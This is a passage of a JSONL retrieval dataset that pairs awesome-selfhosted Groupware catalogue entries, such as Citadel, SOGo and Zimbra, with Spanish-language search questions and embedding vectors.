clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "que programa selfhosted sirve para tener todo el correo, calendario y notas sincronizados?", "v": [-0.22183, -0.02039, -0.11957, -0.15246, 0.07264, -0.19313, -0.00023, -0.04638, -0.04812, -0.12078, -0.10456, -0.15171, 0.0752, -0.08573, 0.02944, 0.04457, 0.06206, -0.05183, 0.1392, 0.07809, -0.10676, -0.01786, -0.00364, -0.08788, -0.09993, -0.00482, 0.07795, -0.02019, -0.11742, 0.11924, -0.01245, -0.11416, 0.13595, -0.05557, 0.01064, 0.0047, 0.07755, 0.07009, -0.25536, 0.03307, 0.00444, 0.07154, -0.02146, 0.04162, 0.01165, -0.02701, 0.03552, 0.1388, -0.02918, -0.00222, 0.00083, -0.05452, 0.00704, -0.00214, 0.01245, -0.07564, 0.01919, -0.0903, -0.02206, -0.02508, 0.03352, 0.01722, 0.08241, -0.04068, -0.02646, 0.02971, 0.07606, -0.00199, -0.06592, 0.06674, -0.01939, -0.07165, 0.11478, -0.09593, -0.03032, -0.02371, 0.0279, 0.00273, -0.04669, -0.03983, -0.07267, -0.02985, -0.04883, 0.10362, -0.09526, -0.03297, 0.08616, 0.07795, 0.01765, 0.06844, 0.07164, 0.05786, -0.02031, 0.08678, 0.07842, -0.00325, 0.03452, -0.04136, 0.02529, 0.00731, 0.1102, -0.06132, -0.0412, 0.03487, -0.05992, 0.12103, 0.03965, 0.10684, 0.00772, 0.13293, -0.07187, -0.02084, -0.08067, -0.04903, -0.0435, 0.03991, 0.02035, -0.01555, 0.04616, -0.09193, -0.07688, 0.0402, -0.0151, -0.02157, 0.06214, 0.00245, 0.02102, 0.05539, 0.04974, 0.1082, -0.05245, -0.01453, -0.03804, -0.03496, -0.04704, -0.07475, -0.04368, -0.01348, 0.01752, -0.05573, 0.04314, 0.07848, 0.04316, -0.00413, 0.0093, 0.0131, 0.01507, -0.10004, -0.03703, 0.049, -0.08218, -0.02118, 0.06774, 0.02482, -0.08172, -0.10254, 0.00927, -0.03003, 0.02663, -0.03128, -0.09063, -0.01225, 0.00277, 0.04274, 0.06729, -0.05126, -0.0043, 0.02339, 0.04256, 0.09634, 0.00243, 0.07319, 0.11554, -0.05994, 0.02978, -0.08567, 0.05559, -0.04415, -0.01949, 0.04024, -0.05998, 0.06134, 0.03043, 0.01004, -0.02058, -0.02722, -0.02792, 0.02173, 0.04602, -0.03491, -0.00519, -0.02926, -0.01307, -0.01611, 0.02283, 0.01615, -0.02474, -0.02063, -0.05479, -0.06309, -0.04216, -0.06198, 0.04723, 0.0304, 0.04693, 0.13189, -0.09099, 0.04176, 0.02143, 0.13373, 0.01082, -0.00335, 0.02689, 0.03154, -0.01582, -0.05419, 0.02735, 0.07122, 0.04576, -0.00828, 0.044, -0.02815, 0.03453, 0.02438, -0.04631, -0.001, 0.04969, -0.01683, 0.07083, 0.01461, -0.0009, 0.01018, -0.013, -0.02244, 0.00409, -0.03138, 0.02293, 0.03212, 0.0382, -0.07958, -0.04037, 0.03278, 0.0087, -0.02402, -0.06416, -0.00447, -0.01302, -0.05336, -0.00343, -0.00097, -0.01605, 0.03694, 0.04523, -0.00746, 0.0308, 0.08592]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "con quΓ© puedo montar una suite de colaboraciΓ³n en tiempo real como alternativa a Slack o Notion?", "v": [-0.06397, 0.09134, -0.27133, 0.04884, -0.10946, -0.15842, -0.05978, -0.00106, -0.05722, 0.02889, -0.11204, -0.19083, 0.17047, -0.06705, 0.02859, 0.12259, -0.01595, -0.15808, -0.10796, 0.07675, -0.00409, -0.07234, -0.12584, -0.03984, 0.09877, -0.03911, 0.12992, 0.04179, -0.03205, 0.065, -0.0456, 0.14212, -0.00887, -0.00099, 0.01858, -0.10367, 0.15275, -0.00869, 0.09249, -0.0971, -0.02245, -0.10471, -0.01251, 0.00642, -0.03958, -0.01516, -0.1298, -0.03019, -0.05582, 0.06371, -0.03562, -0.0169, -0.07572, 0.06188, -0.04323, -0.04695, 0.17816, -0.06606, 0.02781, -0.07054, -0.10649, 0.10179, 0.01161, 0.01684, 0.14937, 0.01824, -0.03738, -0.01472, -0.01707, 0.00873, -0.07064, -0.08434, -0.00012, -0.11262, -0.14815, 0.03739, 0.02122, -0.02788, -0.02365, -0.05431, 0.07164, 0.02019, 0.08523, 0.08363, -0.04521, 0.03187, 0.08007, -0.13541, -0.02345, 0.00023, -0.03869, 0.10987, 0.05659, 0.0541, -0.00028, -0.06218, 0.092, 0.01807, -0.01837, 0.04376, -0.00108, 0.02459, -0.10497, 0.02963, 0.05192, 0.01054, 0.0392, -0.00593, 0.0038, 0.03278, -0.02434, 0.06342, -0.07418, -0.06983, -0.02528, -0.13911, 0.0288, -0.03399, -0.06917, -0.02969, -0.05138, 0.02238, -0.06102, -0.03049, 0.02101, 0.04331, 0.07088, -0.03296, -0.00913, -0.03175, -0.10863, -0.00169, -0.05949, -0.07682, -0.01581, 0.02339, 0.0124, -0.0063, 0.06171, -0.07672, 0.06036, -0.03949, -0.01194, -0.08895, -0.04847, -0.00424, -0.04064, -0.0781, -0.01649, -0.00398, 0.05841, 0.04574, 0.04571, 0.08593, -0.01246, 0.00459, 0.02337, 0.03441, 0.00578, 0.09939, 0.00623, 0.00862, -0.05811, 0.00585, -0.04293, -0.0749, -0.01539, -0.01442, -0.03328, 0.01389, 0.01927, 0.04331, 3e-05, -0.03748, 0.02992, -0.02965, -0.0316, -0.04603, 0.02735, -0.05515, -0.01404, -0.00297, -0.02709, 0.02909, 0.0276, -0.06732, -0.02533, 0.07279, -0.00353, 0.01615, -0.03566, -0.01996, 0.07781, 0.03573, -0.02376, -0.07243, 0.06743, -0.07206, 0.0407, 0.00272, -0.05648, -0.06037, 0.00766, -0.00464, 0.01033, 0.02964, -0.08689, 0.13672, 0.02522, 0.02728, 0.06078, -0.04437, 0.07146, -0.01217, -0.01909, 0.01354, -0.0034, -0.01108, 0.00258, 0.01763, -5e-05, 0.00607, 0.03392, 0.00126, -0.02806, 0.00244, -0.00068, 0.12371, 0.00069, 0.04911, -0.01299, -0.02111, 0.00969, -0.00575, 0.01653, 0.00592, 0.03468, 0.03041, -0.02504, 0.00331, 0.00426, 0.02809, -0.01252, 0.0066, -0.00899, -0.01466, -0.09195, -0.01889, 0.00601, -0.05806, -0.00659, 0.06568, 0.01669, -0.01583, 0.03014, 0.0023]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word clouds (documentation in French) [AGPL-3.0, Nodejs]. Digiwall β€” Create multimedia collaborative walls for in-person or remote work (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "cuΓ‘l es una herramienta gratuita para crear pizarras digitales colaborativas remotas?", "v": [0.26754, -0.04355, -0.12501, -0.04232, 0.14721, -0.11962, -0.01399, -0.01012, -0.09519, -0.07642, 0.028, -0.15237, 0.02893, -0.11994, 0.08397, -0.06944, 0.11425, -0.0023, 0.01006, -0.09232, 0.02708, -0.00875, -0.0788, -0.07419, -0.04571, -0.18294, 0.05611, -0.08113, -0.1333, 0.10697, 0.10092, 0.01041, 0.01281, -0.02165, -0.08607, -0.0377, 0.03005, -0.01173, 0.03343, -0.0409, -0.00363, 0.13435, -0.05614, 0.08386, 0.01725, 0.02238, -0.0051, 0.019, -0.03709, 0.10566, -0.06462, -0.06451, -0.0533, 0.00973, -0.01521, -0.14615, 0.2447, -0.16741, 0.00641, -0.10715, -0.03805, 0.0608, -0.02103, -0.01555, 0.0077, -0.0847, 0.03047, -0.08163, -0.13976, 0.12992, 0.02923, 0.03758, 0.04254, -0.07534, 0.03688, 0.0115, -0.08859, -0.02256, -0.02842, -0.03214, 0.11557, -0.06255, 0.07137, -0.01153, -0.06201, -0.0924, -0.0111, -0.04614, 0.01131, -0.07433, -0.0384, 0.08501, 0.03472, -0.0164, 0.03519, -0.00396, 0.11415, -0.08333, -0.07129, 0.03792, 0.02993, -0.05621, -0.10621, -0.0248, -0.06954, 0.04423, -0.06986, 0.0019, -0.03892, 0.0063, 0.09549, 0.02102, 0.0392, 0.03959, 0.0069, 0.04589, 0.03881, 0.00475, 0.02003, 0.01028, 0.11938, 0.01733, -0.06814, -0.07241, 0.05402, 0.04768, -0.0076, 0.01625, -0.00344, -0.07226, -0.02209, -0.02114, -0.04847, -0.01947, -0.01844, 0.02771, -0.02311, -0.09778, -0.06813, -0.08833, 0.00398, -0.01184, 0.02969, -0.10353, 0.00667, -0.04918, 0.08097, -0.03821, -0.03331, 0.04509, -0.00895, -0.03894, -0.0767, -0.01805, -0.05296, 0.02691, -0.05757, -0.00713, -0.11383, 0.05295, -0.00616, -0.04636, 0.02741, -0.0195, -0.02656, -0.09415, 0.02865, -0.00468, 0.00961, 0.04887, -0.00253, 0.02488, 0.03517, -0.05545, -0.01528, -0.0307, -0.03849, -0.0048, -0.02192, -0.1161, -0.06708, -0.01989, 0.00468, -0.03444, 0.00868, -0.01227, 0.0195, -0.03879, 0.02092, 0.04913, 0.00673, -0.02778, -0.04379, 0.0112, 0.08682, -0.05764, 0.00838, -0.03586, -0.01585, -0.00551, -0.02361, -0.0203, -0.00157, -0.03691, 0.03385, 0.04173, -0.0132, 0.03918, -0.00447, 0.03239, -0.00265, -0.05169, -0.00889, -0.06392, -0.0442, 0.001, -0.05032, -0.0163, -0.03455, 0.00171, 0.04499, -0.05232, 0.04345, -0.03119, 0.07573, 0.11577, 0.05033, 0.06908, -0.05367, -0.0918, 0.05444, -0.07669, 0.00973, -0.04522, -0.00046, -0.03053, 0.04231, -0.01566, -0.08447, 0.02996, -0.01579, 0.05831, -0.02247, -0.00302, -0.0347, -0.06536, -0.03967, -0.00509, -0.05413, -0.07116, -0.03953, 0.01868, 0.03391, -0.01379, -0.01595, 0.03993]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para gestionar calendarios y contactos en equipo de forma colaborativa", "v": [0.13361, 0.09466, -0.18491, -0.27109, 0.04545, -0.15247, 0.07473, 0.04892, -0.08639, -0.15288, -0.10834, -0.1006, 0.01556, 0.0037, 0.00932, 0.0572, 0.15718, -0.08485, -0.01511, -0.00516, 0.00234, 0.0325, -0.046, -0.01867, -0.01482, -0.02288, 0.08798, -0.10917, -0.03434, -0.02507, 0.03749, -0.01356, 0.03384, -0.04542, 0.06636, 0.02587, -0.039, -0.00811, -0.02704, -0.08263, -0.11362, 0.00187, -0.14812, -0.01693, 0.12741, 0.09425, 0.02829, -0.03088, -0.08706, -0.05311, -0.11997, -0.0603, -0.01378, -0.06053, -0.02423, -0.12625, 0.09951, -0.19759, -0.08265, -0.03002, 0.03179, -0.00442, -0.05115, 0.06959, 0.05343, -0.00497, 0.07207, -0.04497, -0.10366, 0.04159, -0.04374, 0.02691, 0.02004, -0.06481, 0.03254, -0.01249, 0.11451, 0.07147, -0.02932, -0.06692, 0.04631, 0.01981, 0.08638, 0.08111, -0.05974, 0.02594, 0.13211, 0.04426, -0.02514, -0.08736, -0.03159, -0.01015, -0.07886, -0.07099, 0.04232, 0.01967, 0.05413, 0.01423, -0.00944, 0.04185, 0.01509, -0.00867, -0.08747, 0.07156, -0.06506, 0.07248, 0.0457, 0.01577, 0.02356, 0.04116, 0.04266, -0.1053, -0.056, -0.00979, -0.02422, 0.05015, 0.02329, -0.02986, 0.00803, -0.08754, -0.05467, -0.00881, -0.0258, -0.01792, 0.15507, 0.02191, 0.03443, 0.09178, 0.00758, 0.07537, -0.12908, 0.02738, -0.02479, 0.00672, -0.06419, 0.04101, -0.06866, 0.0912, -0.00363, -0.05593, -0.06674, 0.07233, 0.05866, -0.0541, 0.03995, -0.05326, -0.00533, -0.0709, 0.02436, 0.04319, 0.06428, 0.00903, -0.05625, 0.08619, -0.05716, -0.02121, 0.02619, 0.03724, -0.05196, 0.00303, -0.05746, -0.01288, -0.05721, 0.0652, 0.06238, -0.06519, 0.04345, -0.03569, 0.05604, 0.06412, 0.02662, 0.03757, 0.08065, -0.09202, 0.00487, -0.03824, -0.00839, -0.07303, 0.00678, -0.02002, -0.03044, 0.04257, 0.01405, 0.01822, -0.0112, -0.00208, -0.0702, 0.11409, -0.01841, 0.0045, -0.0242, 0.07662, 0.08468, -0.0218, 0.03202, -0.05454, 0.02335, 0.00774, -0.02775, -0.0264, 0.03009, 0.0385, 0.05681, 0.05762, 0.03853, 0.09532, -0.10862, 0.07869, 0.06335, 0.10432, 0.05549, -0.0422, 0.05609, 0.01259, -0.0511, -0.03431, -0.0181, -0.00611, 0.04017, 0.02796, 0.00701, 0.02405, 0.06522, -0.00155, 0.05865, -0.02566, 0.03116, 0.03675, 0.02827, -0.01723, -0.01956, -0.01873, 0.03885, -0.07504, -0.00263, -0.02859, 0.03599, -0.01155, -0.02737, -0.01929, 0.00042, 0.06601, 0.00845, 0.01994, -0.04781, -0.04067, -0.0567, 0.02044, 0.00045, -0.03695, -0.00544, 0.05327, 0.0502, -0.02163, 0.04022, 0.04195]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a los servicios de grupo como Outlook para compartir proyectos y archivos", "v": [0.00031, 0.00928, -0.1084, -0.17897, -0.10006, -0.12372, 0.02324, -0.08854, -0.01153, -0.08559, -0.09257, -0.20029, 0.10407, 0.11482, 0.06948, -0.07507, 0.22756, -0.08546, 0.03821, -0.03056, -0.15225, 0.09668, -0.07847, -0.01551, -0.00289, -0.06301, 0.0234, 0.03203, 0.01354, 0.07819, 0.01107, -0.07986, 0.0137, -0.04861, 0.04969, 0.00434, 0.14998, 0.09614, 0.0653, -0.06848, -0.05673, -0.01559, -0.08231, 0.10442, 0.05058, -0.02745, -0.06169, 0.12722, 0.05383, -0.00028, -0.09814, -0.05608, -0.145, 0.11422, 0.00997, 0.0405, 0.02473, -0.15824, -0.05081, 0.00226, -0.09112, 0.0802, -0.03983, -0.05715, 0.01586, -0.01774, -0.05844, 0.0783, -0.14236, 0.11263, 0.11593, -0.01121, 0.05868, -0.06913, -0.08963, 0.02527, 0.00545, -0.05405, -0.13863, 0.05373, 0.09169, -0.03833, 0.02403, 0.0352, 0.005, -0.10762, 0.06956, -0.01134, -0.01527, -0.00644, 0.0778, -0.00019, -0.03935, 0.04445, -0.02363, -0.07099, 0.03744, 0.02675, 0.02131, -0.0654, -0.01937, -0.01217, -0.09508, 0.10387, 0.02888, 0.073, -0.03676, 0.05896, -0.03879, 0.04777, 0.0337, 0.05481, 0.10758, 0.03255, -0.0201, -0.12441, -0.03953, -0.03563, 0.04026, 0.03414, 0.00179, 0.00968, -0.04749, -0.00702, 0.02509, -0.02258, 0.03857, 0.06228, -0.07341, 0.08222, 0.01323, -0.01169, -0.11211, -0.03127, -0.13747, -0.08053, 0.06672, -0.04925, 0.0507, -0.02407, 0.03665, 0.00962, -0.01189, -0.01203, 0.0691, 0.03447, 0.02344, 0.02593, 0.02674, -0.04547, -0.05924, 0.00957, -0.05076, 0.01356, -0.08508, -0.00116, -0.03955, -0.02276, -0.04106, 0.08988, -0.02991, -0.00255, 0.03357, 0.04681, -0.03158, -0.05258, 0.00131, 0.00527, 0.03811, 0.05148, 0.04777, 0.03038, 0.04538, -0.08117, 0.04649, 0.00386, 0.00973, -0.09633, 0.1133, 0.00229, -0.02628, 0.03176, -0.06508, 0.0449, -0.03825, -0.04065, -0.02186, 0.06058, 0.00352, 0.06079, -0.10385, -0.009, -0.0595, -0.04738, -0.025, -0.01913, -0.05539, -0.08381, -0.03651, -0.0339, -0.02979, -0.08795, -0.01391, 0.0427, -0.06684, -0.02741, -0.03371, 0.07571, 0.05117, 0.08192, 0.05563, 0.02365, 0.06917, 0.00216, -0.03136, 0.00479, 0.03382, -0.02137, 0.03197, 0.05065, -0.03223, -0.02625, 0.01112, -0.03035, 0.0467, 0.03297, -0.00096, 0.01836, -0.03657, 0.02234, 0.02383, 0.00732, -0.03405, 0.02402, 0.09382, -0.01413, 0.01872, 0.00781, 0.02555, 0.00918, 0.06775, 0.05308, -0.01419, 0.02068, -0.06873, 0.00095, -0.06279, 0.01775, -0.02986, -0.02754, -0.01733, 0.06571, 0.00298, 0.01323, 0.07187, -0.00376]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: egroupware β€” Software suite including calendars, address books, notepad, project management tools, client relationship management tools (CRM), knowledge management tools, a wiki and a CMS [GPL-2.0, PHP]. Group Office β€” Enterprise CRM and groupware tool. Share projects, calendars, files and e-mail online with co-workers and clients [AGPL-3.0, PHP]. Openmeetings β€” Video conferencing, instant messaging, whiteboard, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming [Apache-2.0, Java]. SOGo β€” SOGo offers multiple ways to access the calendaring and messaging data. CalDAV, CardDAV, GroupDAV, as well as ActiveSync, including native Outlook compatibility and Web interface [LGPL-2.1, Objective-C]. Tine β€” Software for digital collaboration in companies and organizations. From powerful groupware functionalities to clever add-ons, tine combines everything to make daily team collaboration easier [AGPL-3.0, Docker].", "indexar": "quΓ© herramienta sirve para videoconferencias y ediciΓ³n colaborativa de documentos junto con mensajerΓ­a instantΓ‘nea", "v": [0.19766, 0.06699, -0.09888, -0.14706, 0.10925, -0.17554, -0.033, -0.0321, 0.02503, -0.09021, -0.03043, -0.11079, 0.04188, -0.09597, 0.01352, 0.12706, 0.24624, -0.03474, 0.03804, -0.08304, 0.07423, 0.03392, -0.10201, -0.05283, -0.02499, -0.02442, 0.00982, -0.03174, -0.03125, -0.00269, 0.06756, -0.01048, 0.0605, -0.0076, -0.12213, -0.02431, 0.01166, 0.01445, -0.07833, 0.07666, -0.01698, 0.06914, -0.10535, 0.01806, 0.00064, -0.01002, -0.01044, 0.09043, -0.07762, 0.12142, -0.02364, -0.09109, -0.09881, 0.06335, -0.09754, -0.09583, 0.2589, -0.16079, -0.02482, -0.08998, -0.00841, 0.01617, -0.09025, -0.04141, -0.02778, 0.01134, 0.02132, -0.11084, -0.07732, 0.08054, -0.07617, 0.04064, 0.1039, -0.02936, -0.07552, 0.02425, -0.1314, 0.11649, -0.08058, 0.10675, 0.11271, -0.02024, 0.00969, -0.00779, -0.00555, -0.06864, -0.00222, -0.01079, 0.07811, -0.07416, 0.01182, 0.05136, 0.04865, -0.05641, 0.07193, -0.06148, -0.00517, -0.12755, -0.03031, 0.05397, 0.10363, -0.08036, -0.0906, -0.00132, -0.03558, -0.00107, -0.08747, -0.00209, -0.09566, 0.06901, 0.09036, 0.06504, 0.04088, 0.05086, 0.00333, -0.02167, 0.0211, -0.03362, 0.01841, -0.08209, 0.06482, 0.02689, -0.02245, -0.01923, 0.03243, 0.04834, -0.06702, 0.04647, -0.02167, -0.0554, 0.01719, -0.06758, -0.07362, -0.00466, 0.06551, -0.02721, -0.0011, -0.08037, -0.04999, -0.05524, 0.01717, -0.03755, -0.01249, -0.06288, -0.00463, 0.00634, 0.01952, -0.04233, -0.03228, 0.01925, 0.10406, -0.09886, -0.06686, -0.07607, -0.01289, -0.01244, -0.03116, 0.014, -0.13077, -0.01813, -0.01129, -0.02835, 0.00944, 0.06088, -0.02183, -0.03794, 0.03852, 0.06034, 0.02023, 0.04924, 0.06794, -0.04541, 0.06433, -0.05411, -0.02652, -0.08122, -0.00791, 0.00761, -0.02888, -0.13668, -0.03252, 0.01381, 0.02047, 0.00214, 0.07697, -0.02637, 0.03232, -0.04886, 0.03955, 0.02325, 0.02692, 0.04807, -0.01859, -0.03859, 0.00404, -0.04999, -0.02625, -0.07414, 0.03484, 0.05299, -0.03075, -0.0446, -0.00223, 0.00906, -0.01883, 0.06709, -0.07147, 0.01238, -0.00125, 0.01062, -0.03981, 0.00351, 0.01611, -0.00628, -0.01337, 0.00135, 0.04194, 0.04909, -0.01066, 0.0307, 0.04004, -0.05635, 0.01696, -0.08193, 0.0395, 0.06863, 0.05396, 0.02082, 0.0076, -0.02497, -0.01986, 0.01251, -0.05999, -0.01288, 0.04524, -0.04222, 0.00975, -0.01656, -0.06045, -0.04761, -0.03878, -0.01011, -0.02544, 0.01482, -0.04268, -0.00999, -0.02185, -0.05196, -0.02604, -0.01776, -0.02105, 0.00298, 0.02896, -0.01564, -0.01319, -0.03372]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "que programa es para gestionar email, calendario y colaboraciΓ³n de equipos?", "v": [-0.01938, 0.05441, -0.04272, -0.32866, -0.01076, -0.16187, 0.04028, 0.09957, -0.06253, -0.15761, -0.08311, -0.04965, 0.0604, -0.02107, 0.01579, 0.04066, 0.12241, -0.06815, 0.00104, 0.04538, -0.00592, 0.11332, -0.04045, -0.02118, -0.04589, 0.03222, -0.02599, -0.02118, 0.03574, 0.02805, 0.05444, -0.00273, 0.01108, -0.08592, 0.12481, 0.05098, 0.02324, 0.05132, -0.08691, -0.06628, -0.10044, -0.0359, -0.08799, -0.05345, 0.0929, -0.00238, 0.10582, 0.06977, 0.04039, -0.10477, -0.10803, -0.01857, 0.06817, -0.05064, 0.01829, -0.07781, 0.03511, -0.16979, -0.03859, -0.09721, 0.0657, -0.02158, -0.03413, 0.02214, 0.01623, 0.05481, 0.07977, -0.05532, -0.11917, 0.07793, 0.01485, -0.06788, -0.032, -0.07989, -0.01418, -0.09049, 0.09244, 0.07846, -0.07042, -0.08636, -0.00101, 0.02216, 0.09658, 0.1241, -0.02865, -0.02333, 0.0923, 0.04259, -0.00872, -0.06819, -0.01457, 0.04206, -0.07895, -0.00283, 0.07567, -0.01944, 0.10986, -0.09034, -0.05153, 0.08174, 0.00872, 0.02635, -0.07507, 0.09731, -0.0773, 0.09448, 0.0538, 0.05675, 0.04646, 0.11884, -0.06845, -0.09916, -0.03324, -0.02518, -0.06057, -0.00108, 0.03547, -0.03751, 0.05941, -0.04029, -0.06314, 0.01358, -0.02986, -0.0056, 0.15789, 0.02188, 0.07845, 0.09107, 0.00334, 0.07967, -0.11673, -0.00526, -0.03704, 0.10018, -0.09114, 0.02891, -0.08264, 0.00756, -0.03016, -0.06393, -0.05578, 0.06948, 0.07446, 0.00779, 0.07012, -0.06854, -0.03117, -0.06687, 0.01848, 0.06467, 0.04268, 0.01239, -0.01077, 0.04779, -0.06466, -0.02394, -0.00649, 0.04532, -0.07199, -0.01194, -0.1019, -0.01467, -0.00108, 0.05904, 0.0747, -0.06166, 0.04125, -0.01252, 0.00139, 0.07463, -0.00426, 0.04877, 0.07229, -0.02594, -0.06212, -0.02897, 0.0784, -0.07124, 0.00815, 0.02359, -0.09285, 0.06222, 0.05445, 0.05127, -0.06261, -0.00793, -0.07671, 0.07333, -0.009, 0.00672, 0.01637, 0.01864, 0.03816, -0.02896, 0.05038, -0.02111, -0.02983, -0.01965, -0.02826, -0.03908, -0.00575, 0.00804, 0.06894, 0.08421, -0.03141, 0.09935, -0.08167, 0.04416, 0.04202, 0.08938, 0.0314, -0.02659, 0.01351, 0.00664, -0.04828, -0.0335, -0.01763, 0.05615, 0.06545, 0.02454, 0.00107, -0.00835, 0.03423, 0.004, -0.01841, -0.02206, 0.06542, 0.07258, 0.04764, -0.02203, -0.04211, -0.04912, 0.00369, -0.00442, -0.03093, 0.02005, 0.05804, -0.03414, -0.00795, -0.00391, -0.03507, 0.05357, 0.02674, 0.01489, -0.03628, 0.01773, -0.03717, -0.00743, -0.03276, -0.00445, -0.02058, 0.02892, -0.01066, -0.0125, 0.03924, 0.03302]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "cual puedo usar como alternativa gratuita a Zimbra o Microsoft Teams?", "v": [-0.1638, 0.04859, -0.0522, -0.00914, -0.02783, -0.03097, -0.14864, -0.07708, -0.21071, -0.14255, -0.07463, -0.1413, 0.10398, 0.07375, 0.00993, -0.01523, 0.19978, -0.00197, 0.05777, -0.09797, 0.17101, -0.0697, -0.07982, -0.14726, -0.05353, 0.00141, 0.0415, -0.10963, -0.17707, -0.03206, 0.03142, -0.01119, -0.004, -0.02337, 0.01695, 0.02438, 0.0916, 0.07609, 0.11474, -0.05516, -0.03957, 0.10229, -0.05356, 0.07386, 0.04112, 0.08182, -0.02153, 0.00556, 0.03435, 0.01313, -0.063, 0.03729, -0.08709, -0.02716, 0.03995, -0.09219, 0.10898, -0.13744, -0.02099, 0.00564, 0.03516, 0.13023, -0.01188, 0.05717, -0.02521, -0.06174, -0.07728, -0.03177, -0.0649, 0.08344, 0.03348, -0.00076, 0.08241, -0.15754, -0.08318, 0.11419, -0.04936, -0.04161, 0.05806, 0.08653, 0.06451, 0.05457, 0.00655, -0.01567, -0.10436, -0.11582, 0.02644, -0.0162, 0.07974, -0.10286, 0.00247, 0.01361, -0.06279, 0.07155, 0.0115, -0.06679, 0.05558, -0.01017, 0.00563, 0.12067, 0.06083, 0.00797, -0.10773, 0.05905, -0.07737, 0.05199, -0.01484, -0.0193, -0.02537, -0.02529, 0.00288, -0.0621, -0.0774, 0.08744, 0.05539, -0.02994, 0.03462, -0.00699, 